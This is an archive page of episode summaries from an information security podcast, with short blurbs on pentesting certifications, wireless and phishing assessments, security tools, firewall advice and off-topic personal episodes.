So far I've focused on the technical aspects of PCI, but I'm trying to get familiar with the overall scoping questions that my tenacious QSA friends ask when they start a gap analysis. This episode shares some interesting tidbits I learned while doing some QSA "shadowing" on an assessment of a restaurant.

We're going off topic today and talking about video games! LIMBO for the Xbox!

Yep, we're talking about how to make ENEMIES during a security assessment today (and maybe turn them into friends).

When you start a security assessment with a company, not everybody's gonna be glad to see you. The IT dept and other employees may have tense shoulders, thinking that this is an Office Space situation where they're interviewing for their jobs. This episode talks about some ways you might be able to get your assessment off to a right start.

I've been looking for better ways to learn Burp Suite and I struck gold! Check out my recommendations in today's episode!

So yeah, this is kind of off-topic, but have you thought about security in the sense of "What kinds of security things should I be doing before I'm dead?" Today's episode explores that.

Sometimes I get in situations where clients want their WHOLE security program reviewed, but in reality, they are still in the baby steps phase. What's the right thing to do when, for lack of a better term, the client isn't ready to put on their security big boy points?

Today's episode is about Umbrella, a product from OpenDNS that provides a layer of protection against malware, wifi-jacking and other threats.

We're going offtopic today and talking about the Citizen Four documentary, which centers around the Edward Snowden story.

Today we're talking about a new (to me) Web site/app scanning tool called AppSpider by Rapid7. Again, this isn't a commercial or paid advertisement. I just like sharing things that I like and use.

This episode's about a cool security app called GlassWire, which is (kind of) a firewall on steroids. I love it! Oh, and this is not an endorsement or a commercial :-)

Today I talk about challenge I run into when I'm delivering to a mixed audience of C-level folks and IT people. How do you keep things high level enough so everybody "gets it" but also go level enough that the recommendations have some teeth?

This episode concludes the gripping, thrilling, exciting, awesome-ing, death-defying, unsettling, rattling series on OSWP (Offensive Security Wireless Professional). Specifically, I talk (as much as I can without getting into trouble) about the exam and give you some pointers to pass it!

Need an easy way to create a modular/mobile kit of pentest tools to take with you from machine to machine? And ALSO be able to update all those modules in one command? Then check out the PTF! That's what we're talkin' about on today's podcast.

Hey have you heard of Pwn Pads? They're an awesome network pentesting tool that leverages a Nexus tablet - which you can either buy right from Pwnie Express, or create your own if you have a certain model of Nexus lying around. I just happened to have the right Nexus model around, so this podcast episode chronicles my trial and error (mostly error) in making a DIY Pwn Pad! P.S. to get the Android tools installed on Ubuntu 14.04, run these commands: -- sudo add-apt-repository ppa:nilarimogard/webupd8 sudo apt-get update sudo apt-get install android-tools-adb android-tools-fastboot --

in this episode I talk about my first hands-on experience with a Wifi Pineapple, and why you'll probably want one too.

The OSWP series is coming to a close. One final episode today and then the four-quel episode will be all about the test!

A continuation of our thrilling, exciting, mind-blowing series on OSWP (Offensive Security Wireless Professional)!

This episode kicks off a multi-part series all about the OSWP (Offensive Security Wireless Professional) certification.

In episode #79 I shared some gripes about Nessus. Those gripes were quickly answered by Tenable staff/support so I wanted to pass relevant updates on to you!

In this episode I talk about one of my favorite vulnerability scanners, Nessus, and why I want to simultaneously hug it and punch it in the neck.

In this episode I advocate for proper network segmentation, as doing it (well and right!) can seriously reduce your risks!

This week i used my Wifi Pineapple to scare and amuse my coworkers and lure them into a Rickroll trap. All the gory details in today's episode!

I know this is a bit late, but I wanted to talk a little about the LastPass breach and why I'll still remain a customer.

I wanted to share (what I think is) an amusing anecdote about my son's first piano recital, which was topped off by a kid playing the song "Lucky." Many LOLs commenced for me.

In this episode I share some strategies and apps that may help you stay more organized as you go about your infosec work!

This episode is the exciting continuation of a recent pentest I did, in which I got some serious pwnage, including cracking the domain admin password! 7MS #73: PCI Pentesting 101 – Part 2 (audio)

I’m pumped to talk about an about an awesome, free little tool that made my Internet connection feel like new again. 7MS #72: PCI Pentesting 101 (audio)

We’re going totally off topic today and doing a movie review of Mad Max! 7MS #71: OFFTOPIC-Mad Max (audio)

I’m pumped to talk about an about an awesome, free little tool that made my Internet connection feel like new again. 7MS #70: Get the Most out of Your DNS! (audio)

Are you too hard on yourself? Do you think the success of your client’s infosec program lives and dies with you? Listen to this episode. You might feel better. 7MS #69: I’m Not Responsible for Your Information Insecurity (audio)

This episode is about something that got my undies in a bunch – I heard a security expert imply that training and awareness might be worthless! 7MS #68: Is Training and Awareness Worth It or Worthless (audio)

This is a follow-up to episode #64, in which I did some fun wireless sniffing and tried to find sensitive data within it! In the episode I talk about the network “map” of my sniffing setup. It looks like this: Ethernet from client->upstream port of hub My laptop with Wireshark->Hub Wifi access point->Hub To find…

This is a follow-up to episode #63, discussing the results of a fun phishing campaign I recently completed. 7MS #66: I’m Excited to Go Phishing – Part 2 (audio)

Warning, this episode is off topic and has NOTHING to do with infosec! Nope! Instead, it’s a review of the movie Still Alice. Yep. That happened. 7MS #65: OFFTOPIC-Still Alice (audio)

I got a fun project involving wireless sniffing, followed up by scraping through packets looking for credit card data! Here’s part 1, which talks about about software/hardware you might need to do this the right way. 7MS #64: Wifi Sniffing is Fun-Part 1 (audio)

This week I’ll be launching a phishing campaign against an organization that has been well trained to defend against such malicious attacks and links! Will this organization break my company’s 100% success rate for phishing, or will I be able to craft an email to fool at least one person? 7MS #63: I’m Excited to…

I’m excited about this! Microsoft has released a tool called Local Administrator Password Solution to help administrators manage local admin credentials for domain-joined machines. Check out this article for more information, and please contact me if you end up running this, as I’d love to hear about your experience. 7MS #62: You Should Run LAPS…

Users running as local admins on their machine are a big risk! This episode discusses some reasons why, and also here is the link to the Avecto study I mention regarding how many Microsoft vulnerabilities would be thwarted by removing admin rights. 7MS #61: Why Local Admin Rights Suck (audio)

This episode was inspired by two awesome customer service experiences I had in the past week. It got me thinking: how can we as infosec professionals suck less with our customer service approach? 7MS #60: How Not to Suck at Customer Service (audio)

A few episodes back I talked about Red Giant, a cool service that provides you with a pre-paid debit card that can be controlled/locked with your phone. I finally got my card working, and this episode’s about some cool things I learned about it. 7MS #59: Traveling with a Red Giant – Part 2 (audio)

At the end of just about every assessment I deliver, the client asks “What should we do first?” They (understandably) want to know a “top 5″ list of things they should change right away to improve their security posture. Today’s episode explores that a bit. 7MS #58: What Should We Do Next? (audio)

In this episode I talk about a few different ways to approach firewall reviews/audits. This document was very helpful in getting my template started. Also check out Nipper if you’re looking for a firewall review/audit tool. 7MS #57: How to Review a Firewall (audio)

A few offtopic things: What you can expect as far as a podcast release schedule going forward Two suspicious charges that showed up on my credit card while out of town! 7MS #56: OFFTOPIC – Catching Up and Blowing Noses (audio)

Ok I don’t really have a murse, but I wanted to do a short video(!) podcast to show you some sorta-security-related gadgets that I’ve been nerding out on the last few weeks. 7MS #55: OFFTOPIC – What’s in Brian’s Murse? (video)

If you’re concerned about your credit/debit card security, you might want to give Red Giant a try. It’s a service that provides a debit card you can unlock *only* when buying something. It’s cool. Oh, and Red Giant is NOT sponsoring this episode. If I ever get sponsors, I’ll disclose them clearly. :-) 7MS #54:…

Business DR plans are a hugely important – and often overlooked – piece of the infosec puzzle. But what about at home? If you got run over by a bus tomorrow, would you have good plans in place to help your partner/spouse take over the tech side of your household? That’s what we’re talkin’ about…

It’s another off-topic episode today. This one’s about how my eight-year-old son is fiercely loyal, and wants to settle a 25-year-old score for me. 7MS #52: OFFTOPIC – My Son is Really Loyal (audio)

A few people have written in asking whether to pursue the CEH or OSCP (or both). This episode discusses my experience with each cert and hopefully points you in the right direction on which one might be right for you. Here’s the article on CEH I mention during the episode – it has much more…

At last, the epic conclusion of the maddening, redeeming OSCP journey. 7MS #50: OSCP – The Final Chapter – part 2! (audio)

We’ve arrived at the exciting two-part finale to my bloody battle with the OSCP! 7MS #49: OSCP – the final chapter – part 1! (audio)

Is it a good idea to give young kids a computer to play with? Maybe. Maybe not. Tune in to today’s episode and weigh in! 7MS #48: So I Gave My Eight Year Old a Computer (audio)

Hey, you should log the stuff going on in your network. This episode talks about that (again). And I reference some AD-related settings that may not be enabled in your environment…stuff you might want to turn on. Check out that information via this PDF here. 7MS #47: Logging and Alerting Reloaded (audio)

So you want to be a hacker? Cool. In this episode I toss myself under the bus and share why I used to have a really dumb perspective on what that meant, and how my view of hackers – and hacking – has changed (and hopefully matured). 7MS #46: So You Want to be a…

Warning, this is an off topic episode! I used to pirate software. There. I admitted it. But it’s funny how a letter from the Comcast legal dept. will change your mind and let you see piracy in a whole new light! 7MS #45: OFFTOPIC – Why I Stopped Pirating Software (audio)

Warning, this is an off topic episode! Did you know it’s fun to stay at the YMCA? Did you also know it’s fun to annoy annoying people at the YMCA? Listen to this episode to find out why. 7MS #44: OFFTOPIC – Annoying People at the YMCA (audio)

Did you know that Web site vulnerability scanners can destroy your customer sites? If not, listen to this. 7MS #43: Why Web Site Vulnerability Scanners Can Ruin Your Day (audio)

I think everybody throws around the terms “vulnerability scans” and “pentests” and they mean completely different things from one person to the next. In this episode I try to clarify the differences and distinctions (in my mind, anyways). 7MS #42: Vulnerability Scans vs. Pentests (audio)

Tried of talking about OSCP yet? Me neither! 7MS #41: OSCP – Part 7 (audio)

PART SIX of a mind-bending series all about OSCP! 7MS #40: OSCP – Part 6 (audio)

I took a Disney cruise with my family recently, and one particular aspect of the trip gave me the Big Brother heebie-jeebies. 7MS #39: Infosec on the Disney Boat (audio)

Every once in a while I thought it would be fun to go slightly off topic and talk about other stuff I’m interested in. This episode kind of has a tech twist though. I talk about how I use my iPhone and a few apps to stay at least a little bit in shape. 7MS…

Ever wanted to pass hashes a whole network at a time? Check out this episode, where I talk about one of my fav new tools called Keipmx. 7MS #37: Keimpx (audio)

More talk about OSCP goodness. Download: 7MS #36: OSCP – Part 5 (audio)

This is the 4th thrilling installment in our exciting series about the awesome, challenging, rage-inducing, but ultimately rewarding training and certification called OSCP. Download: 7MS #35: OSCP – Part 4 (audio)

I found a great bit of reading that walks you through the “plays” of hacking – enumeration, exploitation, post-exploitation, etc. It’s a great (and affordable) book called The Hacker Playbook. Cheggitowt! Download: 7MS #34: The Hacker Playbook (audio)

This episode’s all about a cool product called ProXPN that I use to encrypt/anonymize my traffic for various reasons. Not a sponsored episode or anything like that, but I am a fan of this service :-). Download: 7MS #33: ProXPN (audio)

Been a while since I shared an update on OSCP progress. It’s going good but…slow. However, I do have one (maybe obvious) tip to share that I hope will save you a ton of time. Download: 7MS #32: OSCP – part 3 (audio)

Network Detective is a tool we’ve been using as kind of an addendum to our full security assessment. It gives some nice, plain-English Excel spreadsheets and Word docs that report on AD health and structure, PC inventory and open ports, AV clients that aren’t working right, and a whole lot more. Download: 7MS #31: Network Detective…

Most organizations I talk to have no idea where their privileged accounts are used across the network. I recently saw a demo of a solution called CyberArk, which seems to address that problem. Download: 7MS #30: Managing Privileged Accounts (audio)

This isn’t necessarily related to security, but it’s about one of my favorite tools to keep my todos organized: FollowUp Then! Download: 7MS #29: Follow Up Then (audio)

This is more of a random, wondering aloud type of episode as I think about raising my kids with infosec in mind. Specifically, what’s life going to be like for them growing up in an Internet-soaked world where there are constantly text/video/photos of them going online – to stay forever? Download: 7MS #28: Infosec for Kids?…

Hey, when it comes to backups…uh…you should have them! This is a NON-endorsed/sponsored episode about my personal favorite backup service called CrashPlan. Download: 7MS #27: Backing Up with Crashplan (audio)

Training and awareness – specifically as it relates to infosec – is something companies can’t spend enough $ on. But from my experience, not enough of them are making this a front-burner priority. This episode talks about one topic I’m particularly passionate about. I call it “How not to click on bad stuff.” Download: 7MS #26:…

This episode talks about some pointers, tools and tips towards writing better pentest reports. Download: 7MS #25: Writing Better Pentest Reports (audio)

This episode is all about why you should (probably not) use wireless hotspots, and keeping yourself safe in general when surfing the Web. Download: 7MS #24: Why Wireless Scares Me (audio)

In this episode I talk more about my adventures with OSCP and Offensive Security! . Download: 7MS #23: OSCP – part 2 (audio) Show notes: I recommend documenting ALL the exercises in the PDF. My understanding is that extra effort could be rewarded if you don’t do so hot on your final exam. Buffer overflows make…

In this episode I talk about using Black Squirrel to launch phishing campaigns! Download: 7MS #22: Phishing with Black Squirrel (audio) Show notes: Security Weekly is an excellent podcast/resource. Devour it regularly. Black Squirrel is the main tool discussed in this podcast. I’ve been using it for phishing campaigns and it’s been excellent in that capacity.

In this episode I talk about my venture into Offensive Security! . Download: 7MS #21: OSCP – part 1 (audio) Show notes: It’s official – I have a death wish and have started the OSCP training. This episode is the first of what I hope will be a multi-part, spoiler-free series about my experience with OSCP. With…

In this episode I talk about why I’m pulling my domains from GoDaddy, and making DNSimple their new home. Download: 7MS #20: Moving from GoDaddy to DNSimple (audio) Show notes: The service I’m talking about in this podcast is DNSimple. Troy Hunt‘s humorous/awesome article pushed me over the edge and convinced me to give DNSimple a…

In this episode I talk about a deliciously vulnerable series of VMs called Kioptrix, and how you can use them to sharpen your pentesting skills. Download: 7MS #19: Kioptrix! (audio) Show notes: The Kioptrix series of VMs is here: http://www.kioptrix.com/blog/test-page/ and here: http://vulnhub.com/?q=kioptrix&sort=date-des&type=vm. Got approved for my OSCP training and I start it in a few…

In this episode I talk about some wireless security basics that we’re not seeing when out on assessments. Download: 7MS #18: Wireless Security 101 (audio) Show notes: WEP encryption is very, very bad. It’s easy to crack. Don’t use it. Wifite will demonstrate how easy it is to crack WEP. Stronger encryption such as WPA/WPA2…

In this episode I share my experience with EC-Council’s Certified Ethical Hacker training and exam. Download: 7MS #17: How to Pass the Certified Ethical Hacker Exam (audio) Show notes: Here’s info on the CEH training and test outline. I took my CEH training through UFairfax with instructor Leo Dregier. See this post I wrote that…

In this episode I talk about my first-hand experience using the PwnPad for wireless pentesting. Download: 7MS #16: PwnPad Initial Impressions – Part 2 Show notes: In a nutshell: PwnPad is a great tool to simplify/automate some wireless recon and/or hacking! PwnieExpress has a great write-up on mapping APs w/GPS coordinates using Google Earth here:…

In this episode I talk about my initial impressions of using the PwnPad for wireless pentesting. Download: 7MS #15: PwnPad Initial Impressions Show notes: Carrying around a Nexus 7 instead of a bulky laptop to do wireless pentesting sure is nice! PwnPad scripts/automates much of the “busy work” to capture WPA handshakes.

In this episode I talk about two (sort of) security related tips that I’ve learned by using Windows 8 wrong. Download: 7MS #14: H8 4 Win8 (audio) Show notes: Windows Defender doesn’t seem to auto-update on Win 8 unless you have updates set to auto download/install. I found a nifty script you can add as…

In this episode I talk about how I had to sent my HP laptop in for repair and, to my surprise, it (allegedly) came back with a bonus: malware! Download: 7MS #13: How to Get Pwned by HP (audio) Show notes: My takeaways/recommendations from this experience: See a pic of my FortiClient picking up on…

In this episode I talk about an account takeover article that freaked me out, and why it changed a few things about how I handle my important online accounts. Download: 7MS #12: Why My Domains Have Gan to Gandi (audio) Show notes: This episode is all about this article (https://medium.com/cyber-security/24eb09e026dd) in which a Twitter user…

In this episode I totally throw my subscribers for a loop and do a VIDEO podcast about overtraining your Touch ID on your iPhone. Download: 7MS #11: Overtraining your iPhone Touch ID (video) Show notes: I first read about this from Steve Gibson of GRC at https://www.grc.com/sn/sn-440.htm. But I was listening to the audio-only version…

In this episode I talk more about some infosec-y things I’m doing on the home front to nurture a security culture (if you will) with my wife and kids. Download: Episode 10: Information Security for the Whole Family – part 2 (audio) Show notes: If you have kids and are considering a tablet for them,…

In this episode I talk about how being an infosec guy has ruined my family’s life (well, not really) Download: Episode 9: Information Security for the Whole Family (audio) Show notes: To keep peace in your household, I’d recommend making sweeping network changes when your family members aren’t around (i.e. changing the wifi password :-)…

In this episode I talk about my experience prepping for the CISSP exam. Download: Episode 8: CISSP – Is That the Cert for Me? (audio) Show notes: I used this book as my primary study tool. It comes with a whole slew of companion materials like a pre-assessment test, flashcards and 3 full practice exams.…

Episode lucky #7!!! In this episode I talk about external network vulnerabilities that we see in many of our assessments – some of which are pretty easy to clear up. Download: Episode 7: External Vulnerabilities that Byte (audio) Show notes: RC4 – a risk that we find just about anywhere SSL is used, but in…

In this episode I continue talking about some basic firewall rules that many organizations don’t have in place. Download: Episode 6: Fun Firewall Rules – part 2 (audio) Show notes: Limit outbound DNS requests to just the ISP servers (or whatever external servers you use). Anytime a firewall rule is changed, perform a vulnerability scan…

In this episode I talk about some basic firewall rules that many organizations don’t have in place. Download: Episode 5: Fun Firewall Rules – part 1 (audio) Show notes: Block outbound port TCP 25 for all devices except your mail server(s). If you use a third party mail filter like Postini or Securence, ensure that…

In this episode I continue talking about some dos and donts of patch strategies – this time talking about enterprise level gear. Download: Episode 4: Patch Strategies: Part Deux (audio) Show notes: There are often two trains of thought in regards to enterprise gear patching (like routers, switches, firewalls). 1. If it ain’t broke, don’t…

In this episode I talk about some trends (and problems) we’re seeing on the patching front – specifically OS and third-party apps. Download: Episode 3: Patch Strategies: Part 1 (audio) Show notes: Most organizations have the Microsoft side of the house patched well – but the third party apps (Java/Flash/Reader/etc.)? Not so much…but that’s just…

In this episode I talk about how a client of ours learned a hard lesson: that the lack of logging/alerting makes for a pretty miserable investigation after they were breached. Download: Episode 2: The Importance of Logging and Alerting! (audio) Show notes: Public-facing terminal servers without 2FA basically have a sign on their back that…

In this episode, I talk about the inspiration behind the 7MS podcast and my vision for it going forward. (Admittedly, my ulterior motive is to use this intro episode to figure out how in the heck to get this podcast submitted and visible on iTunes :-). Download Episode 1: Epic Introduction to 7MS (MP3) I’ll…